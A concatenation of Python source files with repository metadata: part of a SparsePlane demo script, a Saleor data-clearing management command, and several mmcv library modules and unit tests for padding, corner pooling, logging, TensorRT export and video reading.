blended = {}
# centroids for matching
centroids = {"0": [], "1": []}
for i in range(2):
img = cv2.imread(image_paths[str(i)], cv2.IMREAD_COLOR)[:, :, ::-1]
img = cv2.resize(img, (640, 480))
height, width, _ = img.shape
vis = Visualizer(img)
p_instance = create_instances(
pred_dict[str(i)]["instances"],
img.shape[:2],
pred_planes=pred_dict[str(i)]["pred_plane"].numpy(),
conf_threshold=score_threshold,
)
seg_blended = get_labeled_seg(
p_instance, score_threshold, vis, paper_img=paper_img
)
blended[str(i)] = seg_blended
# centroid of mask
for ann in pred_dict[str(i)]["instances"]:
M = center_of_mass(mask_util.decode(ann["segmentation"]))
centroids[str(i)].append(M[::-1]) # reverse for opencv
centroids[str(i)] = np.array(centroids[str(i)])
pred_corr_list = np.array(torch.FloatTensor(assignment).nonzero().tolist())
correct_list_pred = [True for pair in pred_corr_list]
pred_matching_fig = draw_match(
blended["0"],
blended["1"],
centroids["0"],
centroids["1"],
np.array(pred_corr_list),
correct_list_pred,
vertical=False,
)
os.makedirs(output_dir, exist_ok=True)
pred_matching_fig.save(os.path.join(output_dir, prefix + ".png"))
def merge_plane_params_from_local_params(plane_locals, corr_list, camera_pose):
"""
input: plane parameters in camera frame
output: merged plane parameters using corr_list
"""
param1, param2 = plane_locals["0"], plane_locals["1"]
param1_global = get_plane_params_in_global(param1, camera_pose)
param2_global = get_plane_params_in_global(
param2, {"position": np.array([0, 0, 0]), "rotation": np.quaternion(1, 0, 0, 0)}
)
param1_global, param2_global = merge_plane_params_from_global_params(
param1_global, param2_global, corr_list
)
param1 = get_plane_params_in_local(param1_global, camera_pose)
param2 = get_plane_params_in_local(
param2_global,
{"position": np.array([0, 0, 0]), "rotation": np.quaternion(1, 0, 0, 0)},
)
return {"0": param1, "1": param2}
def merge_plane_params_from_global_params(param1, param2, corr_list):
"""
input: plane parameters in global frame
output: merged plane parameters using corr_list
"""
pred = {"0": {}, "1": {}}
pred["0"]["offset"] = np.maximum(
np.linalg.norm(param1, ord=2, axis=1), 1e-5
).reshape(-1, 1)
pred["0"]["normal"] = param1 / pred["0"]["offset"]
pred["1"]["offset"] = np.maximum(
np.linalg.norm(param2, ord=2, axis=1), 1e-5
).reshape(-1, 1)
pred["1"]["normal"] = param2 / pred["1"]["offset"]
for ann_id in corr_list:
# average normal
normal_pair = np.vstack(
(pred["0"]["normal"][ann_id[0]], pred["1"]["normal"][ann_id[1]])
)
w, v = eigh(normal_pair.T @ normal_pair)
avg_normals = v[:, np.argmax(w)]
if (avg_normals @ normal_pair.T).sum() < 0:
avg_normals = -avg_normals
# average offset
avg_offset = (
pred["0"]["offset"][ann_id[0]] + pred["1"]["offset"][ann_id[1]]
) / 2
avg_plane = avg_normals * avg_offset
param1[ann_id[0]] = avg_plane
param2[ann_id[1]] = avg_plane
return param1, param2
def save_pair_objects(
img_file1,
img_file2,
p_instances,
output_dir,
prefix="",
pred_camera=None,
plane_param_override=None,
show_camera=True,
corr_list=[],
webvis=False,
):
"""
if tran_topk == -2 and rot_topk == -2, then pred_camera should not be None, this is used for non-binned camera.
if exclude is not None, exclude some instances to make fig 2.
idx=7867
exclude = {
'0': [2,3,4,5,6,7],
'1': [0,1,2,4,5,6,7],
}
"""
image_paths = {"0": img_file1, "1": img_file2}
meshes_list = []
# map_files = []
uv_maps = []
cam_list = []
# get plane parameters
plane_locals = {}
for i in range(2):
if plane_param_override is None:
plane_locals[str(i)] = p_instances[str(i)].pred_planes
else:
plane_locals[str(i)] = plane_param_override[str(i)]
# get camera 1 to 2
camera1to2 = {
"position": np.array(pred_camera["position"]),
"rotation": quaternion.from_float_array(pred_camera["rotation"]),
}
# Merge planes if they are in correspondence
if len(corr_list) != 0:
plane_locals = merge_plane_params_from_local_params(
plane_locals, corr_list, camera1to2
)
os.makedirs(output_dir, exist_ok=True)
for i in range(2):
if i == 0:
camera_info = camera1to2
else:
camera_info = {
"position": np.array([0, 0, 0]),
"rotation": np.quaternion(1, 0, 0, 0),
}
p_instance = p_instances[str(i)]
plane_params = plane_locals[str(i)]
segmentations = p_instance.pred_masks
meshes, uv_map = get_single_image_mesh_plane(
plane_params,
segmentations,
img_file=image_paths[str(i)],
height=480,
width=640,
webvis=False,
)
uv_maps.extend(uv_map)
meshes = transform_meshes(meshes, camera_info)
meshes_list.append(meshes)
cam_list.append(camera_info)
joint_mesh = join_meshes_as_batch(meshes_list)
if webvis:
joint_mesh = rotate_mesh_for_webview(joint_mesh)
# add camera into the mesh
if show_camera:
cam_meshes = get_camera_meshes(cam_list)
if webvis:
cam_meshes = rotate_mesh_for_webview(cam_meshes)
else:
cam_meshes = None
# save obj
if len(prefix) == 0:
prefix = "pred"
save_obj(
folder=output_dir,
prefix=prefix,
meshes=joint_mesh,
cam_meshes=cam_meshes,
decimal_places=10,
blend_flag=True,
map_files=None,
uv_maps=uv_maps,
)
def get_parser():
parser = argparse.ArgumentParser(description="SparsePlane Demo")
parser.add_argument(
"--config-file",
default="./tools/demo/config.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument(
"--input",
default="./tools/demo/teaser",
help="A path to a folder of input images",
)
parser.add_argument(
"--img-list", default=None, help="A path to a text file for inference"
)
parser.add_argument(
"--output", default="./debug", help="A directory to save output visualizations"
)
return parser
def inference_pair(output_dir, model, dis_opt, con_opt, im0, im1):
"""
Network inference on a single pair of images.
"""
pred = model.inference(im0, im1)
pred_dict = model.process(pred)
# save segmentation only
image_paths = {"0": im0, "1": im1}
p_instances = {}
for i in range(2):
img = cv2.imread(image_paths[str(i)], cv2.IMREAD_COLOR)
img = cv2.resize(img, (640, 480))
vis = Visualizer(img)
p_instance = create_instances(
pred_dict[str(i)]["instances"],
img.shape[:2],
pred_planes=pred_dict[str(i)]["pred_plane"].numpy(),
conf_threshold=0.7,
)
p_instances[str(i)] = p_instance
seg_blended = get_labeled_seg(p_instance, 0.7, vis, paper_img=True)
os.makedirs(os.path.join(output_dir), exist_ok=True)
cv2.imwrite(os.path.join(output_dir, f"view{i}_pred.jpg"), seg_blended)
cv2.imwrite(os.path.join(output_dir, f"view{i}.jpg"), img)
# Optimize
optimized_dict = dis_opt.optimize(pred_dict)
optimized_dict = con_opt.optimize(im0, im1, pred_dict, optimized_dict)
# visualize
save_matching(
im0,
im1,
pred_dict,
optimized_dict["best_assignment"],
output_dir,
prefix="corr",
paper_img=True,
)
# save original image (resized)
cv2.imwrite(
os.path.join(output_dir, "view0.jpg"), cv2.resize(cv2.imread(im0), (640, 480))
)
cv2.imwrite(
os.path.join(output_dir, "view1.jpg"), cv2.resize(cv2.imread(im1), (640, 480))
)
# save obj
save_pair_objects(
os.path.join(output_dir, "view0.jpg"),
os.path.join(output_dir, "view1.jpg"),
p_instances,
os.path.join(output_dir),
prefix="refined",
pred_camera=optimized_dict["best_camera"],
plane_param_override=optimized_dict["plane_param_override"],
show_camera=True,
corr_list=np.argwhere(optimized_dict["best_assignment"]),
webvis=True,
)
def main():
args = get_parser().parse_args()
# Load cfg
cfg = get_cfg()
get_sparseplane_cfg_defaults(cfg)
cfg.merge_from_file(args.config_file)
# Initialize network
model = PlaneRCNN_Branch(cfg)
# Initialize optimizer
dis_opt = Discrete_Optimizer(cfg)
con_opt = Continuous_Optimizer()
if args.img_list: # a text file
f = open(args.img_list)
lines = f.readlines()
f.close()
for line_idx, line in enumerate(tqdm(lines)):
output_dir = os.path.join(args.output, "{:0>4}".format(line_idx))
os.makedirs(output_dir, exist_ok=True)
line = line.strip()
splits = line.split(" ")
im0 = os.path.join(args.input, splits[0])
im1 = os.path.join(args.input, splits[1])
inference_pair(output_dir, model, dis_opt, con_opt, im0, im1)
else: # a directory
input_dir = args.input
output_dir = args.output
im0 = os.path.join(input_dir, "view_0.png")
im1 = os.path.join(input_dir, "view_1.png")
inference_pair(output_dir, model, dis_opt, con_opt, im0, im1)
if __name__ == "__main__":
main()
``` |
{
"source": "Jin-LiuGit/Python_ECommerece",
"score": 2
} |
#### File: management/commands/cleardata.py
```python
from django.core.management.base import BaseCommand
from saleor.order.models import Order, Fulfillment
from saleor.payment.models import Payment, Transaction
from saleor.checkout.models import Checkout
class Command(BaseCommand):
help = "Populate database with test objects"
def add_arguments(self, parser):
parser.add_argument(
"--orders",
action="store_true",
dest="orders",
default=False,
help="Delete orders",
)
def handle(self, *args, **options):
self.stdout.write("Delete objects")
if options["orders"]:
Transaction.objects.all().delete()
Payment.objects.all().delete()
Fulfillment.objects.all().delete()
Checkout.objects.all().delete()
Order.objects.all().delete()
``` |
{
"source": "jinliwei1997/mmcv",
"score": 2
} |
#### File: cnn/bricks/padding.py
```python
import torch.nn as nn
from .registry import PADDING_LAYERS
PADDING_LAYERS.register_module('zero', module=nn.ZeroPad2d)
PADDING_LAYERS.register_module('reflect', module=nn.ReflectionPad2d)
PADDING_LAYERS.register_module('replicate', module=nn.ReplicationPad2d)
def build_padding_layer(cfg, *args, **kwargs):
"""Build padding layer.
Args:
cfg (None or dict): The padding layer config, which should contain:
- type (str): Layer type.
- layer args: Args needed to instantiate a padding layer.
Returns:
nn.Module: Created padding layer.
"""
if not isinstance(cfg, dict):
raise TypeError('cfg must be a dict')
if 'type' not in cfg:
raise KeyError('the cfg dict must contain the key "type"')
cfg_ = cfg.copy()
padding_type = cfg_.pop('type')
if padding_type not in PADDING_LAYERS:
raise KeyError(f'Unrecognized padding type {padding_type}.')
else:
padding_layer = PADDING_LAYERS.get(padding_type)
layer = padding_layer(*args, **kwargs, **cfg_)
return layer
```
#### File: mmcv/ops/corner_pool.py
```python
import torch
from torch import nn
from torch.autograd import Function
from ..utils import ext_loader
ext_module = ext_loader.load_ext('_ext', [
'top_pool_forward', 'top_pool_backward', 'bottom_pool_forward',
'bottom_pool_backward', 'left_pool_forward', 'left_pool_backward',
'right_pool_forward', 'right_pool_backward'
])
class TopPoolFunction(Function):
@staticmethod
def forward(ctx, input):
output = ext_module.top_pool_forward(input)
ctx.save_for_backward(input)
return output
@staticmethod
def backward(ctx, grad_output):
input, = ctx.saved_tensors
output = ext_module.top_pool_backward(input, grad_output)
return output
class BottomPoolFunction(Function):
@staticmethod
def forward(ctx, input):
output = ext_module.bottom_pool_forward(input)
ctx.save_for_backward(input)
return output
@staticmethod
def backward(ctx, grad_output):
input, = ctx.saved_tensors
output = ext_module.bottom_pool_backward(input, grad_output)
return output
class LeftPoolFunction(Function):
@staticmethod
def forward(ctx, input):
output = ext_module.left_pool_forward(input)
ctx.save_for_backward(input)
return output
@staticmethod
def backward(ctx, grad_output):
input, = ctx.saved_tensors
output = ext_module.left_pool_backward(input, grad_output)
return output
class RightPoolFunction(Function):
@staticmethod
def forward(ctx, input):
output = ext_module.right_pool_forward(input)
ctx.save_for_backward(input)
return output
@staticmethod
def backward(ctx, grad_output):
input, = ctx.saved_tensors
output = ext_module.right_pool_backward(input, grad_output)
return output
class CornerPool(nn.Module):
"""Corner Pooling.
Corner Pooling is a new type of pooling layer that helps a
convolutional network better localize corners of bounding boxes.
Please refer to https://arxiv.org/abs/1808.01244 for more details.
Code is modified from https://github.com/princeton-vl/CornerNet-Lite.
Args:
mode(str): Pooling orientation for the pooling layer
- 'bottom': Bottom Pooling
- 'left': Left Pooling
- 'right': Right Pooling
- 'top': Top Pooling
Returns:
Feature map after pooling.
"""
pool_functions = {
'bottom': BottomPoolFunction,
'left': LeftPoolFunction,
'right': RightPoolFunction,
'top': TopPoolFunction,
}
cummax_dim_flip = {
'bottom': (2, False),
'left': (3, True),
'right': (3, False),
'top': (2, True),
}
def __init__(self, mode):
super(CornerPool, self).__init__()
assert mode in self.pool_functions
self.mode = mode
self.corner_pool = self.pool_functions[mode]
def forward(self, x):
if torch.__version__ != 'parrots' and torch.__version__ >= '1.5.0':
dim, flip = self.cummax_dim_flip[self.mode]
if flip:
x = x.flip(dim)
pool_tensor, _ = torch.cummax(x, dim=dim)
if flip:
pool_tensor = pool_tensor.flip(dim)
return pool_tensor
else:
return self.corner_pool.apply(x)
```
#### File: runner/hooks/sampler_seed.py
```python
from .hook import HOOKS, Hook
@HOOKS.register_module()
class DistSamplerSeedHook(Hook):
def before_epoch(self, runner):
if hasattr(runner.data_loader.sampler, 'set_epoch'):
# in case the data loader uses `SequentialSampler` in Pytorch
runner.data_loader.sampler.set_epoch(runner.epoch)
elif hasattr(runner.data_loader.batch_sampler.sampler, 'set_epoch'):
# batch sampler in pytorch warps the sampler as its attributes.
runner.data_loader.batch_sampler.sampler.set_epoch(runner.epoch)
```
#### File: mmcv/runner/utils.py
```python
import os
import random
import sys
import time
from getpass import getuser
from socket import gethostname
import numpy as np
import torch
import mmcv
def get_host_info():
return f'{getuser()}@{gethostname()}'
def get_time_str():
return time.strftime('%Y%m%d_%H%M%S', time.localtime())
def obj_from_dict(info, parent=None, default_args=None):
"""Initialize an object from dict.
The dict must contain the key "type", which indicates the object type, it
can be either a string or type, such as "list" or ``list``. Remaining
fields are treated as the arguments for constructing the object.
Args:
info (dict): Object types and arguments.
parent (:class:`module`): Module which may containing expected object
classes.
default_args (dict, optional): Default arguments for initializing the
object.
Returns:
any type: Object built from the dict.
"""
assert isinstance(info, dict) and 'type' in info
assert isinstance(default_args, dict) or default_args is None
args = info.copy()
obj_type = args.pop('type')
if mmcv.is_str(obj_type):
if parent is not None:
obj_type = getattr(parent, obj_type)
else:
obj_type = sys.modules[obj_type]
elif not isinstance(obj_type, type):
raise TypeError('type must be a str or valid type, but '
f'got {type(obj_type)}')
if default_args is not None:
for name, value in default_args.items():
args.setdefault(name, value)
return obj_type(**args)
def set_random_seed(seed, deterministic=False, use_rank_shift=False):
"""Set random seed.
Args:
seed (int): Seed to be used.
deterministic (bool): Whether to set the deterministic option for
CUDNN backend, i.e., set `torch.backends.cudnn.deterministic`
to True and `torch.backends.cudnn.benchmark` to False.
Default: False.
rank_shift (bool): Whether to add rank number to the random seed to
have different random seed in different threads. Default: False.
"""
if use_rank_shift:
rank, _ = mmcv.runner.get_dist_info()
seed += rank
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
if deterministic:
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
```
#### File: mmcv/utils/version_utils.py
```python
import os
import subprocess
def digit_version(version_str):
"""Convert a version string into a tuple of integers.
This method is usually used for comparing two versions.
Args:
version_str (str): The version string.
Returns:
tuple[int]: The version info in digits (integers).
"""
digit_version = []
for x in version_str.split('.'):
if x.isdigit():
digit_version.append(int(x))
elif x.find('rc') != -1:
patch_version = x.split('rc')
digit_version.append(int(patch_version[0]) - 1)
digit_version.append(int(patch_version[1]))
return tuple(digit_version)
def _minimal_ext_cmd(cmd):
# construct minimal environment
env = {}
for k in ['SYSTEMROOT', 'PATH', 'HOME']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = subprocess.Popen(
cmd, stdout=subprocess.PIPE, env=env).communicate()[0]
return out
def get_git_hash(fallback='unknown', digits=None):
"""Get the git hash of the current repo.
Args:
fallback (str, optional): The fallback string when git hash is
unavailable. Defaults to 'unknown'.
digits (int, optional): kept digits of the hash. Defaults to None,
meaning all digits are kept.
Returns:
str: Git commit hash.
"""
if digits is not None and not isinstance(digits, int):
raise TypeError('digits must be None or an integer')
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
sha = out.strip().decode('ascii')
if digits is not None:
sha = sha[:digits]
except OSError:
sha = fallback
return sha
```
#### File: tests/test_cnn/test_weight_init.py
```python
import numpy as np
import pytest
import torch
from torch import nn
from mmcv.cnn import (bias_init_with_prob, caffe2_xavier_init, constant_init,
kaiming_init, normal_init, uniform_init, xavier_init)
def test_constant_init():
conv_module = nn.Conv2d(3, 16, 3)
constant_init(conv_module, 0.1)
assert conv_module.weight.allclose(
torch.full_like(conv_module.weight, 0.1))
assert conv_module.bias.allclose(torch.zeros_like(conv_module.bias))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
constant_init(conv_module_no_bias, 0.1)
assert conv_module.weight.allclose(
torch.full_like(conv_module.weight, 0.1))
def test_xavier_init():
conv_module = nn.Conv2d(3, 16, 3)
xavier_init(conv_module, bias=0.1)
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
xavier_init(conv_module, distribution='uniform')
# TODO: sanity check of weight distribution, e.g. mean, std
with pytest.raises(AssertionError):
xavier_init(conv_module, distribution='student-t')
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
xavier_init(conv_module_no_bias)
def test_normal_init():
conv_module = nn.Conv2d(3, 16, 3)
normal_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
normal_init(conv_module_no_bias)
# TODO: sanity check distribution, e.g. mean, std
def test_uniform_init():
conv_module = nn.Conv2d(3, 16, 3)
uniform_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
uniform_init(conv_module_no_bias)
def test_kaiming_init():
conv_module = nn.Conv2d(3, 16, 3)
kaiming_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
kaiming_init(conv_module, distribution='uniform')
with pytest.raises(AssertionError):
kaiming_init(conv_module, distribution='student-t')
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
kaiming_init(conv_module_no_bias)
def test_caffe_xavier_init():
conv_module = nn.Conv2d(3, 16, 3)
caffe2_xavier_init(conv_module)
def test_bias_init_with_prob():
conv_module = nn.Conv2d(3, 16, 3)
prior_prob = 0.1
normal_init(conv_module, bias=bias_init_with_prob(0.1))
# TODO: sanity check of weight distribution, e.g. mean, std
bias = float(-np.log((1 - prior_prob) / prior_prob))
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, bias))
```
#### File: tests/test_ops/test_tensorrt.py
```python
import os
import numpy as np
import onnx
import pytest
import torch
try:
from mmcv.tensorrt import (TRTWraper, is_tensorrt_plugin_loaded, onnx2trt,
save_trt_engine)
except ImportError:
pytest.skip(
'TensorRT should be installed from source.', allow_module_level=True)
if not torch.cuda.is_available():
pytest.skip(
'CUDA is required for this test module', allow_module_level=True)
if not is_tensorrt_plugin_loaded():
pytest.skip(
'Test requires to complie TensorRT plugins in mmcv',
allow_module_level=True)
class WrapFunction(torch.nn.Module):
def __init__(self, wrapped_function):
super(WrapFunction, self).__init__()
self.wrapped_function = wrapped_function
def forward(self, *args, **kwargs):
return self.wrapped_function(*args, **kwargs)
onnx_file = 'tmp.onnx'
trt_file = 'tmp.engine'
def test_roialign():
try:
from mmcv.ops import RoIAlign
except (ImportError, ModuleNotFoundError):
pytest.skip('test requires compilation')
# trt config
fp16_mode = False
max_workspace_size = 1 << 30
# roi align config
pool_h = 2
pool_w = 2
spatial_scale = 1.0
sampling_ratio = 2
inputs = [([[[[1., 2.], [3., 4.]]]], [[0., 0., 0., 1., 1.]]),
([[[[1., 2.], [3., 4.]], [[4., 3.],
[2., 1.]]]], [[0., 0., 0., 1., 1.]]),
([[[[1., 2., 5., 6.], [3., 4., 7., 8.], [9., 10., 13., 14.],
[11., 12., 15., 16.]]]], [[0., 0., 0., 3., 3.]])]
wrapped_model = RoIAlign((pool_w, pool_h), spatial_scale, sampling_ratio,
'avg', True).cuda()
for case in inputs:
np_input = np.array(case[0], dtype=np.float32)
np_rois = np.array(case[1], dtype=np.float32)
input = torch.from_numpy(np_input).cuda()
rois = torch.from_numpy(np_rois).cuda()
with torch.no_grad():
torch.onnx.export(
wrapped_model, (input, rois),
onnx_file,
export_params=True,
keep_initializers_as_inputs=True,
input_names=['input', 'rois'],
output_names=['roi_feat'],
opset_version=11)
onnx_model = onnx.load(onnx_file)
# create trt engine and wraper
opt_shape_dict = {
'input': [list(input.shape),
list(input.shape),
list(input.shape)],
'rois': [list(rois.shape),
list(rois.shape),
list(rois.shape)]
}
trt_engine = onnx2trt(
onnx_model,
opt_shape_dict,
fp16_mode=fp16_mode,
max_workspace_size=max_workspace_size)
save_trt_engine(trt_engine, trt_file)
trt_model = TRTWraper(trt_file, ['input', 'rois'], ['roi_feat'])
with torch.no_grad():
trt_outputs = trt_model({'input': input, 'rois': rois})
trt_roi_feat = trt_outputs['roi_feat']
# compute pytorch_output
with torch.no_grad():
pytorch_roi_feat = wrapped_model(input, rois)
# allclose
if os.path.exists(onnx_file):
os.remove(onnx_file)
if os.path.exists(trt_file):
os.remove(trt_file)
assert torch.allclose(pytorch_roi_feat, trt_roi_feat)
def test_scatternd():
def func(data):
data[:, :-2] += 1
data[:2, :] -= 1
return data
data = torch.zeros(4, 4).cuda()
wrapped_model = WrapFunction(func).eval().cuda()
input_names = ['input']
output_names = ['output']
with torch.no_grad():
torch.onnx.export(
wrapped_model, (data.clone(), ),
onnx_file,
export_params=True,
keep_initializers_as_inputs=True,
input_names=input_names,
output_names=output_names,
opset_version=11)
onnx_model = onnx.load(onnx_file)
# create trt engine and wraper
opt_shape_dict = {
'input': [list(data.shape),
list(data.shape),
list(data.shape)],
}
# trt config
fp16_mode = False
max_workspace_size = 1 << 30
trt_engine = onnx2trt(
onnx_model,
opt_shape_dict,
fp16_mode=fp16_mode,
max_workspace_size=max_workspace_size)
save_trt_engine(trt_engine, trt_file)
trt_model = TRTWraper(trt_file, input_names, output_names)
with torch.no_grad():
trt_outputs = trt_model({'input': data.clone()})
trt_results = trt_outputs['output']
# compute pytorch_output
with torch.no_grad():
pytorch_results = wrapped_model(data.clone())
# allclose
if os.path.exists(onnx_file):
os.remove(onnx_file)
if os.path.exists(trt_file):
os.remove(trt_file)
assert torch.allclose(pytorch_results, trt_results)
```
#### File: tests/test_utils/test_logging.py
```python
import logging
import platform
import tempfile
from unittest.mock import patch
import pytest
from mmcv import get_logger, print_log
if platform.system() == 'Windows':
import regex as re
else:
import re
@patch('torch.distributed.get_rank', lambda: 0)
@patch('torch.distributed.is_initialized', lambda: True)
@patch('torch.distributed.is_available', lambda: True)
def test_get_logger_rank0():
logger = get_logger('rank0.pkg1')
assert isinstance(logger, logging.Logger)
assert len(logger.handlers) == 1
assert isinstance(logger.handlers[0], logging.StreamHandler)
assert logger.handlers[0].level == logging.INFO
logger = get_logger('rank0.pkg2', log_level=logging.DEBUG)
assert isinstance(logger, logging.Logger)
assert len(logger.handlers) == 1
assert logger.handlers[0].level == logging.DEBUG
with tempfile.NamedTemporaryFile() as f:
logger = get_logger('rank0.pkg3', log_file=f.name)
assert isinstance(logger, logging.Logger)
assert len(logger.handlers) == 2
assert isinstance(logger.handlers[0], logging.StreamHandler)
assert isinstance(logger.handlers[1], logging.FileHandler)
logger_pkg3 = get_logger('rank0.pkg3')
assert id(logger_pkg3) == id(logger)
logger_pkg3 = get_logger('rank0.pkg3.subpkg')
assert logger_pkg3.handlers == logger_pkg3.handlers
@patch('torch.distributed.get_rank', lambda: 1)
@patch('torch.distributed.is_initialized', lambda: True)
@patch('torch.distributed.is_available', lambda: True)
def test_get_logger_rank1():
logger = get_logger('rank1.pkg1')
assert isinstance(logger, logging.Logger)
assert len(logger.handlers) == 1
assert isinstance(logger.handlers[0], logging.StreamHandler)
assert logger.handlers[0].level == logging.INFO
with tempfile.NamedTemporaryFile() as f:
logger = get_logger('rank1.pkg2', log_file=f.name)
assert isinstance(logger, logging.Logger)
assert len(logger.handlers) == 1
assert logger.handlers[0].level == logging.INFO
def test_print_log_print(capsys):
print_log('welcome', logger=None)
out, _ = capsys.readouterr()
assert out == 'welcome\n'
def test_print_log_silent(capsys, caplog):
print_log('welcome', logger='silent')
out, _ = capsys.readouterr()
assert out == ''
assert len(caplog.records) == 0
def test_print_log_logger(caplog):
print_log('welcome', logger='mmcv')
assert caplog.record_tuples[-1] == ('mmcv', logging.INFO, 'welcome')
print_log('welcome', logger='mmcv', level=logging.ERROR)
assert caplog.record_tuples[-1] == ('mmcv', logging.ERROR, 'welcome')
with tempfile.NamedTemporaryFile() as f:
logger = get_logger('abc', log_file=f.name)
print_log('welcome', logger=logger)
assert caplog.record_tuples[-1] == ('abc', logging.INFO, 'welcome')
with open(f.name, 'r') as fin:
log_text = fin.read()
regex_time = r'\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}'
match = re.fullmatch(regex_time + r' - abc - INFO - welcome\n',
log_text)
assert match is not None
def test_print_log_exception():
with pytest.raises(TypeError):
print_log('welcome', logger=0)
```
#### File: tests/test_video/test_reader.py
```python
import os
import os.path as osp
import shutil
import tempfile
from collections import OrderedDict
import pytest
import mmcv
class TestCache:
def test_init(self):
with pytest.raises(ValueError):
mmcv.Cache(0)
cache = mmcv.Cache(100)
assert cache.capacity == 100
assert cache.size == 0
def test_put(self):
cache = mmcv.Cache(3)
for i in range(1, 4):
cache.put(f'k{i}', i)
assert cache.size == i
assert cache._cache == OrderedDict([('k1', 1), ('k2', 2), ('k3', 3)])
cache.put('k4', 4)
assert cache.size == 3
assert cache._cache == OrderedDict([('k2', 2), ('k3', 3), ('k4', 4)])
cache.put('k2', 2)
assert cache._cache == OrderedDict([('k2', 2), ('k3', 3), ('k4', 4)])
def test_get(self):
cache = mmcv.Cache(3)
assert cache.get('key_none') is None
assert cache.get('key_none', 0) == 0
cache.put('k1', 1)
assert cache.get('k1') == 1
class TestVideoReader:
@classmethod
def setup_class(cls):
cls.video_path = osp.join(osp.dirname(__file__), '../data/test.mp4')
cls.num_frames = 168
cls.video_url = 'https://www.learningcontainer.com/wp-content/uploads/2020/05/sample-mp4-file.mp4' # noqa: E501
def test_load(self):
# read from video file
v = mmcv.VideoReader(self.video_path)
assert v.width == 294
assert v.height == 240
assert v.fps == 25
assert v.frame_cnt == self.num_frames
assert len(v) == self.num_frames
assert v.opened
import cv2
assert isinstance(v.vcap, type(cv2.VideoCapture()))
# read from video url
v = mmcv.VideoReader(self.video_url)
assert v.width == 320
assert v.height == 240
assert v.fps == 15
assert v.frame_cnt == 1889
assert len(v) == 1889
assert v.opened
assert isinstance(v.vcap, type(cv2.VideoCapture()))
def test_read(self):
v = mmcv.VideoReader(self.video_path)
img = v.read()
assert int(round(img.mean())) == 94
img = v.get_frame(63)
assert int(round(img.mean())) == 94
img = v[64]
assert int(round(img.mean())) == 205
img = v[-104]
assert int(round(img.mean())) == 205
img = v[63]
assert int(round(img.mean())) == 94
img = v[-105]
assert int(round(img.mean())) == 94
img = v.read()
assert int(round(img.mean())) == 205
with pytest.raises(IndexError):
v.get_frame(self.num_frames + 1)
with pytest.raises(IndexError):
v[-self.num_frames - 1]
def test_slice(self):
v = mmcv.VideoReader(self.video_path)
imgs = v[-105:-103]
assert int(round(imgs[0].mean())) == 94
assert int(round(imgs[1].mean())) == 205
assert len(imgs) == 2
imgs = v[63:65]
assert int(round(imgs[0].mean())) == 94
assert int(round(imgs[1].mean())) == 205
assert len(imgs) == 2
imgs = v[64:62:-1]
assert int(round(imgs[0].mean())) == 205
assert int(round(imgs[1].mean())) == 94
assert len(imgs) == 2
imgs = v[:5]
assert len(imgs) == 5
for img in imgs:
assert int(round(img.mean())) == 94
imgs = v[165:]
assert len(imgs) == 3
for img in imgs:
assert int(round(img.mean())) == 0
imgs = v[-3:]
assert len(imgs) == 3
for img in imgs:
assert int(round(img.mean())) == 0
def test_current_frame(self):
v = mmcv.VideoReader(self.video_path)
assert v.current_frame() is None
v.read()
img = v.current_frame()
assert int(round(img.mean())) == 94
def test_position(self):
v = mmcv.VideoReader(self.video_path)
assert v.position == 0
for _ in range(10):
v.read()
assert v.position == 10
v.get_frame(99)
assert v.position == 100
def test_iterator(self):
cnt = 0
for img in mmcv.VideoReader(self.video_path):
cnt += 1
assert img.shape == (240, 294, 3)
assert cnt == self.num_frames
def test_with(self):
with mmcv.VideoReader(self.video_path) as v:
assert v.opened
assert not v.opened
def test_cvt2frames(self):
v = mmcv.VideoReader(self.video_path)
frame_dir = tempfile.mkdtemp()
v.cvt2frames(frame_dir)
assert osp.isdir(frame_dir)
for i in range(self.num_frames):
filename = f'{frame_dir}/{i:06d}.jpg'
assert osp.isfile(filename)
os.remove(filename)
v = mmcv.VideoReader(self.video_path)
v.cvt2frames(frame_dir, show_progress=False)
assert osp.isdir(frame_dir)
for i in range(self.num_frames):
filename = f'{frame_dir}/{i:06d}.jpg'
assert osp.isfile(filename)
os.remove(filename)
v = mmcv.VideoReader(self.video_path)
v.cvt2frames(
frame_dir,
file_start=100,
filename_tmpl='{:03d}.JPEG',
start=100,
max_num=20)
assert osp.isdir(frame_dir)
for i in range(100, 120):
filename = f'{frame_dir}/{i:03d}.JPEG'
assert osp.isfile(filename)
os.remove(filename)
shutil.rmtree(frame_dir)
def test_frames2video(self):
v = mmcv.VideoReader(self.video_path)
frame_dir = tempfile.mkdtemp()
v.cvt2frames(frame_dir)
assert osp.isdir(frame_dir)
for i in range(self.num_frames):
filename = f'{frame_dir}/{i:06d}.jpg'
assert osp.isfile(filename)
out_filename = osp.join(tempfile.gettempdir(), 'mmcv_test.avi')
mmcv.frames2video(frame_dir, out_filename)
v = mmcv.VideoReader(out_filename)
assert v.fps == 30
assert len(v) == self.num_frames
mmcv.frames2video(
frame_dir,
out_filename,
fps=25,
start=10,
end=50,
show_progress=False)
v = mmcv.VideoReader(out_filename)
assert v.fps == 25
assert len(v) == 40
for i in range(self.num_frames):
filename = f'{frame_dir}/{i:06d}.jpg'
os.remove(filename)
